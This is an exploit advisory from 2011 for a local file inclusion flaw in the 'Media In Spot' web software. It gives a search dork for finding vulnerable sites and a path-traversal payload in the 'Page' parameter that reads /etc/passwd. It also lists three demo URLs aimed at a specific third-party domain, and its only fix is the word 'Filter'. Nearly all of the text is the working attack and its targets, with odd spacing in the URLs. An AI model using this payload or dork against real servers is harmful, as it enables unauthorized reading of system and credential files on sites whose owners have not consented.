# Name: Media In Spot LFI Vulnerability
# Date: May, 16 2011
# Vendor Url: http: http://www.mediainspot.com/
# Dork :"
"Powred By Media In Spot ""
# Author: wlhaan haker <iit [at] hotmail.com>
######################################## #####################
Exploit:
Http: // server/path/index. php? Page = .. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd
######################################## #######################
Fix:
Demo
Http://www.bkjia.com/view/lang/index.php? Page = .. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd
Http://www.bkjia.com/index.php? Page = .. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd
Http://www.bkjia.com/ufp/view/lang/index.php? Page = .. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd
Fix: Filter